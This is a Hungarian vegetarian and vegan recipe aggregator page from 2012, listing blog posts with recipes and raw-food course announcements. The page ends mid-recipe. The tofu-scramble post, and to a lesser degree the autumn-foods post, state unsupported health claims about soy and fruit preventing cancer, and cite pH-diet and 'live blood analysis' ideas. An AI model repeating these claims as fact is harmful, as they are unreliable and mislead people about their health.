Anya átválogatta egyik este az almát, és megemlítette, hogy régen készítettem almás pitét, elhasználhatnánk abba a rosszabbját. Könnyen belementem, mert az almás süti bizony finom dolog. Ő pucolt, én gyúrtam. Illetve a kenyérsütő gép, aztán én. A tésztához adtam egy kis darált diót, amitől nagyon finom íze lett, és még a diót nem szerető családtagjaim sem panaszkodtak miatta. Hozzávalók: 30 dkg tk liszt 5-10 dkg darált dió 3 ek olivaolaj 2 ek zabliszt 1 ek rizsliszt (elhagyható) 1/2 ek lenmag (elhagyható) 1 cs foszfátmentes sütőpor 1 csipet só 250 ml must (szőlőlé, almalé) A száraz hozzávalókat egy tálban összekeverjük, majd ráöntjük a mustot. Ha almalével, vagy más gyümölcslével készítjük, adjunk hozzá 1-2 ek gyümölcscukrot, mert azok nem olyan édesek.
Forró almás-datolyás palacsinta
2012. november 14. Mindennapi ételeink
Nagyon finom palacsinta. :-) Hozzávalók: 50 dkg finomliszt 5 dkg zabpehelyliszt 8 dkg kukoricaliszt csipet só 1 liter víz 4 ek. 100% extra szűz olívaolaj -- 1 kg alma 10 szem datolya 1 citrom héja Elkészítés: A liszteket összekeverjük, hozzáöntjük a vizet és olajat. Sózzuk és alaposan összekeverve kisütjük (olaj nélküli, kerámiaserpenyőben). Az almát meghámozzuk, lereszeljük. A datolyát kevés vízzel összeturmixoljuk. Ezt öntjük hozzá édesítőszerként. Citromhéjjal is ízesítjük és megpároljuk. Ezzel töltjük meg a palacsintákat.
Répás-krumplis káposztafőzelék
2012. november 13. Mindennapi ételeink
Ez a tegnapi ebédünk volt, egy finom répafasírttal. Hozzávalók: 1/2 fej édeskáposzta 2 nagyobb krumpli 1 nagyobb sárgarépa 1 fej vöröshagyma 1 l vegimilk 3 tk. köménymag 3 tk. majoranna 3 tk. só 3 ek. 100% extra szűz olívaolaj 3 ek. liszt Elkészítés: A káposztát megmossuk és legyaluljuk. A krumplit, répát, hagymát meghámozzuk.A répát nagylyukú reszelőn a káposztához reszeljük. A krumplit kis kockákra vágjuk, hozzáadjuk a káposztához. És végül a hagymát is apró kockákra vágva hozzáadjuk a káposztához. Növényi tejjel felengedjük, majorannával, sóval, fokhagymával ízesítjük, olajjal dúsítjuk. Kb. 30 perc alatt megpároljuk. Ekkor elkészítjük a rántást: olaj nélküli serpenyőben megpirítjuk a lisztet, majd 2 dl növényi tejjel felengedjük. Ezt szűrőn át adjuk a főzelékhez. Összefőzzük és készen is vagyunk :-)
Diós-mákos sületlen, nyers süti falatok
Volt még egy kis gyümölcslapom, ebből szerettem volna valami finomságot készíteni, ez lett belőle. Fincsi Természetesen még sütni sem kell, ráadásul margarin-, tej-, tojás-, cukor-, és lisztmentes! Mivel elég tömény, elég belőle 1-2 szelet. Hozzávalók: - aszalt gyümölcslap (alma, banán püré megaszalva) - diós réteg: darált dió (előtte áztatva, szárítva), méz (vagy más édesítő pl. [...]
Ajvárral töltött kiflik
Praktikus reggeli, tízórai elkészítéséhez alkalmas az ajvárral töltött kifli, főként, ha nem igazán édeset, sokkal inkább sósat szeretnénk csomagolni. Az a klassz benne, hogy előre meg van kenve és reggel csak becsomagoljuk és viheti is a gyerek vagy a házastárs az iskolába, munkába. Ugyanakkor remek partifalat is. Ha vendéget várunk, elkápráztathatjuk vele a vendégeinket. Elkészíteni sem nehéz, csak picit időigényes. Ha mégis édeset szeretnénk készíteni, akkor nem ajvárral, hanem például lekvárral kenjük meg. A recept: Hozzávalók: - 3 dkg friss élesztő - 3,5 dl meleg víz - 30 dkg teljes kiőrlésű búzaliszt - 35 dkg fehér liszt (BL-55) - 2 evőkanál olaj - 1 dkg só - 3 evőkanál őrölt lenmag - ajvár Elkészítés: A kenyérsütő üstjébe belemorzsoljuk az élesztőt, majd ráöntjük a meleg vizet. Sokak szerint kell hozzá valami édes dolog is. Mint például egy kiskanál méz, vagy biocsicsóka. Régen én is raktam az élesztőre mézet, vagy biocsicsókát, azonban láttam egy rövidebb filmet (Ízes hagyományok), ahol falusi asszonyok sütöttek kenyeret, és legfeljebb sót adtak az élesztőhöz és a vízhez, de cukrot semmiféleképpen nem. Azóta édesítő nélkül készítem a kenyeret. Várunk egy rövid ideig, míg az élesztő feloldódik a víz tetejére. Ha cukrot, vagy mézet is raktunk hozzá, akkor az élesztő a víz felszínére kel. Nálam ennek hiányában csak feloldódik. Közben elővesszük a többi hozzávalót. Mikor feloldódott az élesztő, a fenti sorrendben hozzáadjuk a többi anyagot is. Beletesszük a kenyérsütő gépbe és kiválasztjuk azt a programot, amely képes a dagasztásra, kelesztésre. Másfél óra múlva kész a pufók "gombócunk". A tésztát kinyújtjuk, majd háromszögekre vágjuk fel. A háromszögek hosszabb végénél megkenjük ajvárral és ezen a végén kezdjük el felcsavarni. A felcsavart kifliket sütőpapíros tepsire fektetjük, pihentetjük az egészet kb. 20 percet. Sütés megkezdése előtt vízzel megkenjük őket. Kb. 20 perc közepes lángon történő sütés után ismét megkenjük vízzel. Még max. 10 percig sütjük és el is készültek a csinos és finom sós kiflik!
Bundás banán
2012. november 7. Nyers konyha
Valami már megint az eszembe jutott:) Bundás banán: banán mag tej panír: mák, kókuszdara, fahéj, kakaópor.... Maradt mák tejem. Szeleteltem banánt, amit megúsztattam a tejben majd megforgattam minden féle finomságban. Lett mákos, nyers kakaós, kókuszos, fahéjas- kókuszos.... Emmácska meglátva miben mesterkedek segítségemre sietett és együtt alkotgattunk. A banánkarikákat fogpiszkálóval mozgattam tejből, panírba, majd rá a papírra, az aszaló lapjára. Természetesen frissiben is lehet fogyasztgatni, kb. 1 óra aszalás után szuperül rászárad és ragad a panír a banánra, ha hosszabb időre eltárolnánk aszaljuk tovább minimum 1 éjszakát. A tejet lehet ízesíteni is vaníliával esetleg édesíteni.....a többit a fantáziádra bízom... Nekem a mákos a kedvencem, banán ropogós mákszemekkel, hát nem édes a bundájuk!:)
Szuper reggeli: Sütőtökös zabkása pirított dióval
2012. november 6. Zizi kalandjai
Emlékeztek a szuper reggelikre? Tavaly februárban indult, amikor I.-vel cukormentes hónapot tartottunk. Most, hogy újra itt a hideg időszak, érzem, hogy már csak gyümölcs nem elég reggelire. Valami táplálóbbra, gazdagabbra van szüksége a szervezetünknek, amely melegít és energiával tölt fel. Ezért folytatódni fog a szuper reggeli sorozat és jövök jobbnál-jobb receptekkel, amelyek többnyire vegánok!
A zabkását (angolul porridge) még Angliában szerettem meg, amikor ott éltem és egy étteremben dolgoztam. Egyszer egy vendég ezt kérte reggelire. Megkérdeztem tőle, hogy mi ez. Aztán beszaladtam a konyhába és elkészítettem életem első zabkásáját úgy, hogy magamnak is hagytam egy keveset. A reggel sikerrel zárult. A vendég elégedetten távozott, én pedig jóllakottan végeztem tovább a munkám. A zabkása igen laktató és egészséges reggeli, tele jó sok rosttal. Én mindig növényi tejjel (mandula-, zab- vagy rizstej) készítem, mert ezek édesebb ízűek, mint a tehéntej, így néha kibírom, hogy nem adok hozzá semmilyen édesítőszert, csak szárított gyümölccsel és pirított magvakkal eszem. Most viszont adtam hozzá egy kis juharszirupot, amelynek a karamelles íze kiváló párost alkot a sütőtökkel és a dióval. Igazi őszi harmónia ízben és színben egyaránt egy kis tálkában. Hát lehet ennek ellenállni?
Tipp: süssük meg a tököt péntek este, így hétvégén rengeteg finomságot alkothatunk a konyhában, anélkül, hogy időt töltenénk a csodás narancssárga tök megsütésével.
Sütőtökös zabkása pirított dióval
Hozzávalók 2 főre:
- 60 g zabpehely
- 110 g sütőtök püré
- 350 ml zabtej
- 2-3 evőkanál juharszirup (méz, agavé- vagy rizsszirup is használható)
- 1/2 teáskanál fahéj
- csipet szerecsendió
- csipet őrölt szegfűszeg
- egy kis maréknyi dió
Egy száraz serpenyőben 6-8 perc alatt pirítsuk meg a diót és tegyük félre.
Egy kis lábasban közepes láng felett kezdjük el főzni (állandó keverés mellett) a zabpelyhet a zabtejjel. Amikor kezd besűrűsödni hozzáadjuk a sütőtök pürét, a juharszirupot és a fűszereket. Ha túl sűrűnek találjuk adjunk még hozzá egy kevés tejet, jól keverjük el és tálaljuk azonnal. Szórjuk meg pirított dióval.
Őszi ízek- tudatos táplálkozás
2012. november 2. Lét-tudatos konyha
Ősz során érdemes minél több gyümölcsöt és zöldséget fogyasztani, amíg lehetőség van erre, mert a téli hónapok során nem jutunk elegendő friss növényhez. A tárolással, fagyasztással, vagy akár természetes tartósítással megőrzött gyümölcsök és zöldségek -bármennyire körültekintőek vagyunk is-, a hetek, hónapok során jelentősen veszítenek vitamintartalmukból. Gyümölcsök közül említhetjük a FÜGÉT, mely állítólag a legősibb termesztett növényünk. Nyersen vagy szárított változatban is fogyaszthatjuk. Leginkább emésztésre gyakorolt előnyös tulajdonságairól ismert. Magas rosttartalma és magvai révén ugyanis serkenti a gyomor működését, fokozza a bélműködést. 2-3 szem elrágása már telítettség érzést ad, és fokozza a bél perisztaltikáját. Fügéről bővebben: itt. A SZŐLŐ vért és beleket tisztító, idegeket erősítő hatással rendelkezik. Magas természetes cukortartalma energiát biztosít a szervezetnek még nehéz fizikai, de szellemi munka esetén is. Gazdag antioxidánsokban, melyek erősítik az immunrendszert és védelmet nyújtanak a rák és szívkoszorúér-betegségekkel szemben. A szőlő magjából készült olaj értékes tulajdonságokkal rendelkezik. Szőlőről bővebben: itt. Csontjaink védője: a dió A régi falusi házak udvarán szinte mindenhol találunk terebélyes lombú diófát, melynek termése felbecsülhetetlen jelentőségű. A magvakban lévő kalcium erősíti a csontokat, gyermekek számára elősegíti a csontnövekedést, felnőtteknél pedig segít megelőzni a csontritkulást. Vastartalma miatt vérszegénység ellen is ajánlott. Gyermekeknek érdemes darált dióval megszórni a gabonakását. Fogyasztása elősegíti a szellemi munkát, és csökkenti a depresszió kialakulását. Dióról bővebben: itt.
Chiliszósz, csípős paprikakrém házilag
Wikipédia szerint: "Az erek alapi részén az ún. óriás sejtek tartalmazzák a kapszaicint, amitől ízét csípősnek érezzük." Ez a titka annak, hogy miért csíp a csilipaprika. Az előbb bemutattam az édes paprikából készült krémet, most pedig a tüzes ízvilág kedvelőinek is elárulom, lehet házilag is chiliszószt készíteni. Az eljárás lényegében ugyanaz. Az igazság az, hogy először tüzes paprikakrémet készítettem, mert férjem nagyon kedveli a csípős ízt. Ezt követően gondoltam arra, hogy miért ne kedvezhetnék magamnak és a nem csípős ételeknek, ezzel a logikával készült az édesebb krém. A csípős szószhoz végül is bármilyen paprika jó. Vegyesen zöld, piros és sárga színű paprikákat használtam fel. Azért nem lett olyan erősen piros színe, elég, hogy az íze az. Hozzávalók: 2-3 kg csípős paprika só fokhagyma kevés víz üvegek befőzési fólia Elkészítés: A paprikákat megmossuk, majd feldaraboljuk és egy kevés vízen megsózva elkezdjük párolni őket úgy, mint ahogy a lecsót is. Fokhagymát is apríthatunk bele. Vannak, akik ezt olajos alapon készítik. Én egészségesebbnek tartom, ha nem égetünk, nem hevítünk olajat. Felvágás után ügyeljünk arra, hogy a szem és a száj környékét ne dörzsöljük meg az ujjunkkal, ami a paprikákkal érintkezett, mivel irritáció léphet fel. Néhány éve véletlen bogyiszlói paprikát vettem a piacon - tv paprika helyett. Lecsóba elkezdtem feldarabolni és a végén mindkét kezem annyira égett, mintha megégettem volna, vagy erős napozáson égtem volna le. Szerencsére a panthenol sprayt a tenyeremre fújva rövid idő alatt helyreállt a bőr. Tehát a csípős paprikákkal óvatosabban kell dolgozni. Amikor a paprikák megpuhultak, megpárolódtak a fedő alatt, botmixerrel összeturmixoljuk, majd előre elkészített "sterilizált" üvegekbe töltjük a paprikaszószt. Befőzési fóliát teszünk rá, a kupakkal jól lezárjuk és száraz dunsztba fejtetőre állítva megvárjuk, míg néhány nap alatt kihűl. Mikor már nem ad le meleget egyik üveg sem, pincébe vagy kamrába tesszük és szükség esetén felhasználjuk őket. Aki szereti a csiliszószt, nyilván tudja, mibe és hogyan használja fel. Lehetőség erre végtelen. Csak csínnyán bánjunk vele, nehogy a gyomrunk megérezze... Mértékkel, nagyon keveset. Lehetőleg főzés után adjuk az ételhez.
Őszi zabkása
Az a jó a "kása"reggelikben, hogy mindig az adott évszaknak megfelelő gyümölcsökkel lehet változatossá, különlegessé tenni. A zabkásában pedig az a nagyszerű dolog, hogy gyorsabban elkészül, mint egy kevésbé értékes étel, a tejbegríz. Persze ez utóbbit sem vetem meg, mint már korábban kiderült, készítettem már én is tejbegrízt. Most azonban maradjunk a zabkásánál. Abban a paleo és vegán étkűek is egyet értenek, hogy a zabpehely jó a testnek. Magas vérnyomástól vagy cukorbetegségben szenvedőknek ajánlott minél gyakrabban fogyasztani. Addig teljesen értékes táplálék, míg nem adunk hozzá plusz cukrot, vagy nem keverjük édes müzlihez, netalán gyümölcsjoghurthoz. Talán kevesen tudják, hogy nem csak remek reggeli alapanyag, de sűrítéshez is sokkal egészségesebb, mint a krumpli, a keményítő vagy a fehér liszt. Másik nagy előnye, hogy nem ragad le, könnyű az edényt elmosni utána. Ha bármilyen szószt vagy masszát készítünk és túl híg, folyós lett, a zabpehely ezt a gondunkat is könnyedén megoldja. Őrölt formában a szószhoz keverve, a masszában pedig egész zabpelyhek segítenek a nedvesség felszívásában. Ahogy a receptjeimből is kitűnik, egészséges tojáshelyettesítő szinte mindenféle ételhez. Palacsinta, gofri, fasírt - mindegyik esetében alapanyagként használható a zabpehely. Mégis a legegyszerűbb étel vele a zabkása. Már van néhány zabkása receptem a blogon. A következő is a sorozatba kerül. Ezekből is látszik, mennyire változatos reggeliket készíthetünk. A recept: Hozzávalók: 1 adag zabpehely (pl. 2 marék) víz 2-3 szem körte 1 fürt édes szőlő Igény esetén: növényi tej Édes ízhez ragaszkodva: édesítőszer (méz, gyümölcscukor, xilit és társai közül valamelyik) Elkészítés: Ha apró szemű zabpelyhünk van, akkor a lábosban, amiben főzni fogjuk, kicsit megpirítjuk. Épp, amíg illata lesz a pirítástól. Majd felöntjük vízzel. Figyelve és olykor megkeverve addig főzzük, míg a zabpehely meg puhul. Ha nagy szemű zabpehellyel dolgozunk, akkor ugyanígy megpiríthatjuk, de egy éjszakára akár be is áztathatjuk hideg vízbe. Másnap pedig felfőzzük. Az ilyen zabpelyhek több főzési időt igényelnek. Akár főzés előtt is hozzáadhatjuk a felszeletelt, leszemezett gyümölcsöt, mivel úgysem fő olyan sokáig, hogy nagyon károsodna hő hatására. Víz helyett és vízzel együtt is használhatunk valamilyen növényi tejet. Külön ízvilágot kölcsönöz reggelinknek. Fahéjjal, mézeskalács fűszerkeverékkel vagy karobbal megszórhatjuk, de lekvárt is tehetünk a tetejére.
Cukkinis-krumplis kenyérlepény (laktovegetáriánus)
2012. október 24. Dulmina tündérkonyhája
Az idei utolsó cukkinikből ezt a nagyszerű kenyérfélét készítettem el ismét a korábbi nagy sikerre való tekintettel - és most föl is jegyzem a receptet, hogy ne merüljön feledésbe jövő nyárig. Hozzávalók 30 x 40 cm-es tepsihez 1/2 kg teljes kiőrlésű (tönköly)liszt 1/2 kg héjában főtt vagy sült krumpli 2 kis cukkini (vagy 1 kicsi, karcsú, zsenge + egy nagyból egy ökölnyi darab megtisztítva)
Tökös-krémes
Ma kényeztetős napot tartok, az egész heti kormolás, ablak-tisztítás, és takarítás után De jó itt ücsörögni és kiengedni a gőzt A lényeg, hogy holnap felszántják a földecskémet, így most már mindenképp be kell szednem a tököket A hokkaidók nagyon szépek lettek, a sonka tökök még nem értek be. Nem tudom, leszedés után beérnek-e? ó lenne….? [...]
Meghivo: Nyers vegan 5 fogasos vacsora/Invitation: Raw vegan dinner
Október 25. (csütörtök/thursday) 19.00 Őszi ízek az ÉletKonyhától /Autumm flavours from the LifeKitchen Menü Amuse bouche*: wonton** ropogós zöldségekkel, gyömbér mártással Kelkáposzta leves Zsályás -sütőtökös gnocchi tyúkhúr pestoval, sütőtök ropogóssal Körtés pite fahéjkrémmel Petit Fours*** Menu Amuse bouche*: crispy wonton** with vegetables and ginger sauce Savoye cabbage soup Pumpkin gnocchi with sage, chickweed pesto, pumpkin crisp Pear pie with cinnamon cream Petit Fours*** Gasztronómiai szótár: *Amuse bouche: pici falatka mielőtt az étkezés megkezdődne. A séf üdvözlete. ** Wonton: ehető csomagolású, töltött csomag *** Petit fours: ráadás/befejező falatka, általában édes. Például: bonbon, stb. *Amuse bouche: a small bite before the meal begins. Greetings of the Chef. ** Wonton: little edible package with a filling *** Petit fours: a little bite to finish the meal, usually with a sweet taste like a truffle. -------------------------- Több fogásos vacsora / Multi-courses dinner Gourmet, vegan élő ételek / Gourmet, vegan living foods 10-15 fős társaság / 10-15 people Meghitt hangulat / Intimate atmosphere Hangulatos lakásban Budán/In a lovely flat on the Buda side 4900 Ft/fő / 4900 huf/person Regisztrálj az alábbi elérhetőségeken. Kérjük, csak akkor jelentkezz, ha el is tudsz jönni!/ Registration is required. Please, register only if you are willing to come. www.eletkonyha.hu Repka Agnes 0670-70-28187 Kassai Nóra Virág 0630-399-4912 info@eletkonyha.hu
Kuglóf
2012. október 16. Vegetáriánus receptek
Szeretek kuglófot sütni. Mindig sikerül, pedig nem vagyok egyáltalán cukrász véna, a sütőnk is régi és beállíthatatlan. Az alap recepten túl sokszínűen variálható.
Alaprecept:
- 20 dkg liszt
- 20 dkg cukor
- 4 tojás
- 1 dl tej
- 1 dl olaj
- fél csomag sütőpor
A tojásokat szétválasztjuk, egyik tálba a fehérjék a másikba a sárgáják. A sárgákat kikeverjük a cukorral, majd hozzátesszük az összes többi hozzávalót. A fehérjéket habosra verjük, azután óvatosan belekeverjük a másik tál masszájába. A kuglófformát kikenjük vajjal, egy kanál liszttel kibéleljük, és mehet is bele a massza, amit előmelegített sütőben kb. 30-40 percig készre és szépre sütünk.
Én mindig variálom, de biztos, hogy sok nekünk a cukor és az olaj mennyisége is. A mai süti hozzávalói, hívhatnánk reformnak is, de nálunk ez az átlag:
- 20 dkg teljes kiőrlésű búzaliszt
- 10 dkg barna cukor
- 4 tojás
- 1 dl tej
- fél dl mákolaj (hidegen sajtolva)
- 4-5 ek dió (finomra darált; áztatott, a diótej maradékából)
- 1 marék mazsola
Minden ugyanaz, mint fent, csak még a massza egyharmadához 1 ek kakaót és 1 ek lenmaglisztet tettem. Ezt a fehér tésztához csurgattam, amibe 1 marék mazsolát szórtam, majd bele a barna krém és így mikor felvágjuk vidám felhős lesz. Majd mikor megsütöttem, kiborítottam, örültem, hogy újra sikerült. Nem porcukorral szórtam meg a tetejét (mivel nem szeretjük a túl édeset és a cukrosat), hanem kakaóval hintettem meg. Csuda jó ízt ad neki!
Bodolai Móni
Tojásmentes Rántotta
2012. október 10. Fittanyuka Blog
Mielőtt megosztanám veletek ezt a receptet, olvassatok el pár gondolatot a tojásról, illetve a tojás fogyasztásról: tovább olvasom.. Senkit sem szeretnék meggyőzni, hogy miért jó ha valaki tojásmentesen táplálkozik, de ezek az érvek amelyek ellene szólnak számomra elég meggyőzőek, az élővércsepp analízisről nemis beszélve. A recept összetevője a tofu, amely, mint tudjuk szója sajt és a szóját manapság sokan kerülik, ellenzik a fogyasztását, amivel nem értek egyet. Mert általában ez a tábor a hús,-tej,-tojásról megvan győződve, hogy természetes táplálék. Viszont azt aláírom, hogy kerülnünk kell a génmanipulált, túlságosan feldolgozott élelmiszereket, de szerencsére kis hazánkban még nem jellemző a génmanipulált szója. A termék eredetét mindig el kell olvasni! Javaslom, hogy bioterméket válasszatok, megtaláljátok a csomagoláson, hogy biztonságos GMO mentes termék. Néhány érv a tofu mellett: Szerintem ez a szója legtermészetesebb felhasználási módja amely a legősibb múltra tekint vissza. Élettani hatásai: - Kiváló növényi fehérje forrás és számos tápanyag található benne, és az biztos, hogy sokkal jobb, mint bármelyik állati eredetű vagy tejből készült étel. - Az izoflavonoidok - a fitoösztrogének ( növényi, természetes ösztrogének) egyik fajtája - megelőzik a hormonfüggő daganatok, mellrák kialakulását. ( Már a férfiaknál is, hála a dezodoroknak). - A daidzen, egy bizonyos izoflavonoid, gátolja a rákos daganatok növekedését. - A genistein egy enzim, amely gátolja a daganatok növekedését és elősegíti a sejtek differenciálódását. A vizsgálatok szerint gátolja a prosztatában, illetve az emlőben kialakult daganatos sejtek növekedését. - fitinsav kelátot képez a daganatkeltő hatású mycotoxinokkal, így megköti és eltávolítja őket a szervezetből. - proteáz gátlók blokkolják a daganatok növekedését segítő enzimek hatását, mint például a vastagbél,-emlő,-májrák ellen hatnak. - Szója védi a szívet, és elősegíti a hormonháztartás egyensúlyának fenntartását férfiaknál is. forrás: Dr. Robert Young: Ph csoda Ami ajánlott a szójatermékekből választani: Szója csíra, Szója lecitin, tofu. Kerüljük és ritkán fogyasszuk a feldolgozott szójatermékeket: virsli, felvágottak, granulátumok, erjesztett szójatermékek: miszó, tempeh, szójaszósz. Következzen a recept: Hozzávalók ( 2 fő részére): 300 g natúr tofu 200 ml növényi tejszín késhegynyi himalaya só örőlt rózsa bors 1 db közepes vöröshagyma késhegynyi kurkuma kókusz olaj a sütéshez friss petrezselyem zöldje A tofut sajtreszelőn lereszeljük, vagy kézzel elmorzsoljuk majd fűszerezzük: sózzuk, belekeverjük a kurkumát és összedolgozzuk a növényi tejszínnel. Villa segítségével kissé összetörjük. A kókuszolajon a felaprított vöröshagymát üvegesre pároljuk, majd hozzáadjuk a tofus keveréket és addig sütjük ameddig kicsit összeáll. Tálaláskor megszórjuk a petrezselyem zölddel. Fittanyuka
Ételkészítő tanfolyam május 23. csütörtök este
2012. október 9. Nyersétel akadémia
Május 23-án nyersétel készítő tanfolyamot tartunk a Nyersétel Akadémián.
Együtt készítünk egy finom italt, levest, főételt és édességet! Olyan ételek lesznek, amit hétköznap vagy hétvégén te is el tudsz készíteni magadnak és a családodnak!
A tanfolyam 17 órakor kezdődik, a program előadás, ételkészítés és vacsora!
Címünk: Budapest, XIII. Tátra utca 11. 1. emelet 1. 22. kapucsengő
A tanfolyam ára 7900 forint/fő
Jelentkezés itt: gitta@nyersetelakademia.hu e-mail címen.
A részletekről érdeklődj a 30 98-48-931 telefonszámon!
Ételkészítő tanfolyam április 6. szombat délután
2012. október 9. Nyersétel akadémia
Április 6-án nyersétel készítő tanfolyamot tartunk a Nyersétel Akadémián.
Együtt készítünk egy finom italt, levest, főételt és édességet! Olyan ételek lesznek, amit hétköznap vagy hétvégén te is el tudsz készíteni magadnak és a családodnak!
Az együtt készített ételeket a tanfolyam végén közösen elfogyasztjuk. A tanfolyam 15 órakor kezdődik.
Címünk: Budapest, XIII. Tátra utca 11. 1. emelet 1. 22. kapucsengő
A tanfolyam ára 9900 forint, és ugyanennyi, ha ketten jöttök!
Jelentkezés itt: gitta@nyersetelakademia.hu-n nálam.
A részletekről érdeklődj a 30 98-48-931 telefonszámon!
Íme a győztes!
2012. október 9. Gitta nyersétel blogja
A 2. Zöldturmix fesztiválon megrendezésre került nyersétel készítő pályázat első helyezett ételét szeretném bemutatni, fotókkal, recepttel. Simon Márta Viktóriának köszönjük szépen! Le van tesztelve, nagyon finom, és a fotókon is látszik, bizony szép is volt. Cukkíniből készült spagetti avokádós öntettel Avokádós spagetti Hozzávalók: ,,Tésztához: Cukkini Szószhoz: Avokádó: személyenként 1 db Lilahagyma Himalájai só Fokhagyma Őrölt feketebors Himalájai só ,,Sajthoz: Kesudió Himalájai só Öntethez: Tahina (szezámmagkrém) Himalájai só Olaj Lime Kapor Őrölt pirospaprika Elkészítés: A meghámozott cukkinit spagetti formájúra vágjuk és tányérra halmozzuk. A kikapart avokádóhúst ízlés szerinti mennyiségben felaprított, citromlében áztatott lilahagymával, áttört fokhagymával, sóval, borssal, őrölt pirospaprikával ízesítjük, majd a ,,tésztára simítjuk. A 3 órán át vízben áztatott kesudiót aprítógépben áttörjük, sózzuk. A masszát lapos kör alakra formázva a szószos tészta tetejére helyezzük. Az öntethez egy teáskanál tahinát fél lime levével, kevéske vízzel és olajjal apránként simára, krémes állagúra keverünk. Ízlés szerint mézzel édesíthetjük. Apróra vágott friss kaporlevéllel frissítünk a zamatán, majd egyenletesen az étel tetejére csurgatjuk. Pirospaprikával díszíthetjük így elkészült ízekben gazdag egészséges eledelünket. Az étel nemcsak tápláló, de gyorsan elkészíthető, a magam részéről a tökfőzelék nyers változatának tekintem. Hamvas diógolyó Hozzávalók: Dió Mazsola Darált lenmag Citrom Akácméz Kókuszreszelék Elkészítés: A diót és mazsolát aprítógépben áttörjük, citromlével és akácmézzel ízesítjük. Míg elég formázhatóvá nem válik a massza, darált lenmaggal sűríthető. Falatnyi golyókat formázunk belőle, amiket kókuszreszelékbe forgatunk. Édes, lédús szőlőszem társaságában kellemesen oldódik ízlelőbimbóinkon. Jó étvágyat kívánok: Simon Márta Viktória
Spenótos-tofus farfalle pirított dióval
2012. október 8. Mindennapi ételeink
Így együtt nagyon finom és laktató étel. Hozzávalók: 1 kg friss spenót (1/5 kg mirelit) 2 marék kesudió 6 gerezd fokhagyma 4 ek. liszt só-ízlés szerint kb. 1 l víz 1/2 kg farfalle tészta 4-5 ek. 100 %extra szűz olívaolaj 1/2 pritaminpaprikás tofu 1 marék pirított dió Elkészítés: A tésztát kifőzzük. A friss spenótot alaposan megmossuk, majd kevés vízzel, olajjal és sóval kifőzzük. Amennyiben mirelit spenótot használunk, ez nem szükséges. Egy másik edényben a lisztet szárazon megpirítjuk, majd ráöntjük -a főzővízzel együtt - a megfőtt spenótleveleket (vagy a mirelit spenótot felengedés után). Alaposan összekeverjük. Gyorsan elkészítjük a kesudiótejfölt: a kesudiót 4 dl vízzel, sóval, fokhagymával alaposan összeturmixolunk. Ezt ráöntjük a lisztes spenótra, és az ezt az egészet is mixerezzük. (Nem muszáj, ha levelesen szeretjük a spenótot). A tésztával összekeverjük és tálalás előtt ráhelyezzük az előtte száraz serpenyőben megpirított diót + olívaolajjal kikent tepsiben megsütött (előtte felkockázott) tofut.
Örök klasszikus
2012. október 5. AUM Vega Blog
Megunhatatlan kedvenc nálam a sóska. Olyan édesen savanykás finomság. Nem is tudom, minek nevezzem amúgy: se nem főzelék, se nem krém. Egy kicsit mindkettő… Furcsa mód én hidegen szeretem a legjobban. Lehet hozzá mindenfélét enni, leginkább persze főtt krumplit. De én csak úgy, önmagában szoktam belapátolni az egészet.
Cékla-édeskömény lé
Ez a mai ebédem, nagyon nagyon finom!!! ? Előtte fini fenyőrügy teát kortyolgattam Hozzávalók: 1 cékla 1 pici darab édeskömény 2,5 dl forrásvíz A céklát megpucoltam, az édesköménnyel együtt megmostam, és a présgépen lepréseltem. A tömény levet duplájára hígítottam forrásvízzel. Már kortyolgatom is Váljék egészségetekre ? Kategória:Gyógyító italok, Nyers ételek, Receptek
Ma van: Vegetáriánus Világnap!
2012. október 1. Vegetáriánus receptek
A Vegetáriánus Világnapot 1977-ben alapította az Észak-Amerikai Vegetárius Társaság. A világnap azóta hatalmas méretű megmozdulássá nőtte ki magát: a vegetáriánus életmóddal járó lelki békét és életminőség-emelkedést, valamint a Föld minden élőlényének tiszteletét, az egymásra-hangolódást, az együttérzést hirdeti.
Éljen!!! :-)
Bliszkó Viktor
Forrás: http://os.mti.hu/hirek/78110/jeles_napok_oktober_1-vegetarianus_vilagnap
Mákos-mézes chia puding
Isteni finom tízórait készítettem ma: mákos-mézes chia pudingot. Máktejet készítettem, és az abból megmaradt máktörmelék felhasználásához szerettem volna valami édes desszertfélét kipróbálni. Hozzávalók: máktejből megmaradt máktörmelék (vagy darált mák), máktej (vagy más növényi tej, de máktejjel a legfinomabb), méz vagy más növényi édesítő ízlés szerint, chia mag Elkészítés: A máktejbe belekeverjük a hozzávalókat, majd megvárjuk, [...]
Sajttorta
2012. szeptember 23. Vegavarázs
Magyarországon is nagyon elterjedt az utóbbi időben a sajttorta, ez itt egy tojásmentes változata. Ünnepekre kiváló édesség. Hozzávalók: A tésztához: 25 dkg liszt egy csipet só 1/2 kk sütőpor 10 dkg vaj 2 ek tejföl 8 dkg cukor A töltelékhez: 50 dkg ricotta vagy túró egy csipet só 50 dkg natúr... tovább>>
Szilvalekváros kiflik (mogyorótejjel)
Még szeptember első napjaiban készítettem ezeket a csinos és finom kifliket. Egyrészt férjemnek, hogy az osztályát az első tanítási napon ezzel megkínálhassa, valamint vendégségbe is vittük ajándéknak. Nagy sikere volt, már csak azért is, mert a mogyoró különlegessé tette. Mogyorótejjel készítettem, így nem volt szükség se margarinra, se tojásra, se vajra, se olajra a tésztához. A recept: Hozzávalók: - 2,7 dkg friss élesztő - 3,5 dl meleg mogyoró tej - 25 dkg teljes kiőrlésű liszt - 35 dkg fehér liszt (BL-55) - 0.5 dkg só - 8-10 dkg gyümölcscukor vagy nyírfacukor vagy ki mivel édesít - 3 dkg őrölt lenmag (elhagyható) - szilvalekvár - mogyorótejhez mogyoró (1 nagyobb marékkal) - víz Elkészítés: A mogyoróból és a vízből tejet készítünk. Ha van rá mód és idő, akkor a mogyorót érdemes pár órára a vízbe áztatni. (Én kb. 1 órát tudtam csak áztatni.) Ezt követően erős turmixgéppel a vizet és a mogyorót alaposan összeturmixoljuk., majd sűrű szövetű szűrőn átszűrjük. Ezzel kész is a mogyorótej. A szűrőn visszamaradt mogyorót a kiflik megtöltéséhez fogjuk felhasználni. A kenyérsütő üstjébe belemorzsoljuk az élesztőt, majd ráöntjük a növényi tejet. (Ha nem meleg, kézmelegre melegítjük.) Várunk egy rövid ideig, míg az élesztő feloldódik a tej tetejére. A mogyorótejhez nem tettem cukrot, de gyönyörűen a felszínére kelt az élesztő. Közben elővesszük a többi hozzávalót. Mikor feloldódott az élesztő, a fenti sorrendben hozzáadjuk a többi anyagot is, kivéve a lekvárt és a tejből visszamaradt mogyorót. Beletesszük a kenyérsütő gépbe és a dagasztó-kelesztő programot beállítva a gép elvégzi a dagasztást, kelesztést. Amikor kész a tészta, kivesszük és kifliket készítünk belőle. A kiflik készítése: A tésztát 